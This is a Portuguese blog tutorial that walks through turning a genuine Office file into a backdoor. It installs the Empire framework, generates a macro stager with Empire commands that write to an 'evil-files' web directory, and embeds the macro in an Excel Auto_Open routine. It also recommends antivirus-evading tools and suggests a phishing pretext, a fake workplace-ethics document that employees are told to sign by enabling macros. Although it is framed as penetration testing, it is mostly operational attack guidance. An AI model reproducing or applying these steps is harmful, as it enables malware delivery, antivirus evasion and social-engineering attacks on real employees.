Nesse artigo vou demonstrar como podemos utilizar um arquivo do Office Oficial e verdadeiro e embutir um Backdoor nele
Criando Backdoor
Veja aqui como criar um backdoor: https://cibersegurancawernik.blogspot.co.il/2018/01/backdoors-veil-3-e-entrega-com.html
Ou siga esses passos:
A maioria de nós já ouviu falar de msfvenom ou ou pelo menos backdoors Metasploit, eles são grandes, mas eles são detectados por programas antivírus, também sabemos que podemos usar uma ferramenta chamada VeilEvasion como explico em outro post para gerar backdoors que ignoram a maioria dos programas anti-vírus , a eficácia de tais ferramentas depende de quão recentemente, eles foram atualizados,portanto, às vezes Veil irá gerar backdoors que vai ser detectados por vários programas de AV, a maneira de corrigir isso é modificar o backdoor manualmente para torná-lo mais original (este é um completamente tópico diferente, alternativamente, você pode apenas tentar gerar o backdoor usando outra ferramenta, como Empire.
Empire não vem pré-instalado no Kali, siga estes passos simples para instalá-lo:
1.Vá para o diretório / opt (opcional).
cd / opt
2. Clone o projeto do github.
git clone https://github.com/EmpireProject/Empire.git
3. Vá para seu diretório de instalação
Empire cd / setup
4. Execute o instalador
./install.sh
Aguarde até que o instalador ao fim, e então você pode executar a ferramenta de seu diretório em / opt / Império, então primeiro você terá que navegar até ele usando cd
cd / opt / Empire
Em seguida, execute-o
./empire
Agora a ferramenta iniciou e você pode utilizar ela para criar seu backdoor
Agora você está pronto para usar a ferramenta, verificação geral o seguinte vídeo para saber como usar a ferramenta em geral, como um exemplo, você vai aprender como gerar um windows backdoor que os programas anti-vírus de bypass e usar esse backdoor para hackear o Windows 10 .
Gerando um Macro
Para gerar um macro vamos usar o comando do empire
userstager |
Se quisermos criar para windows usamos windows/macro, porém para mac usaremos o comando
userstager osx/macro |
Agora para termos mais informações o comando
info |
set Listener http1 set Outfile /var/www/html/evil-files/osxMacro |
Fazemos o comando info novamente para ver que está tudo atualizado
info |
e iniciamos o backdoor
execute |
Se formos em nosso server veremos o macro lá
Colocando o Macro no Office
Agora vamos ver como colocar ele no arquivo Office
Copiamos esse código, abrimos um Excel em branco
View - View Macros
Macro Name: Auto_Open
Macros in: Workbook1
Clique no +
Cole o código do Macro
Mude o nome de Workbook para Auto_Open
Agora pode acrescentar qualquer texto no arquivo para enviar ao alvo
Salvamos o Arquivo com qualquer nome com o formato em
Excel 97-2004
Clicando nele recebemos um aviso que tem um MACRO, o trabalho do penTester é convencer o alvo abrir os macros
Um bom exemplo é enviar um documento de "Regulamento de ética no trabalho" em que todos os funcionários precisam assinar e aceitar o macro para "reconhecer" a assinatura.
Recebemos controle total do Alvo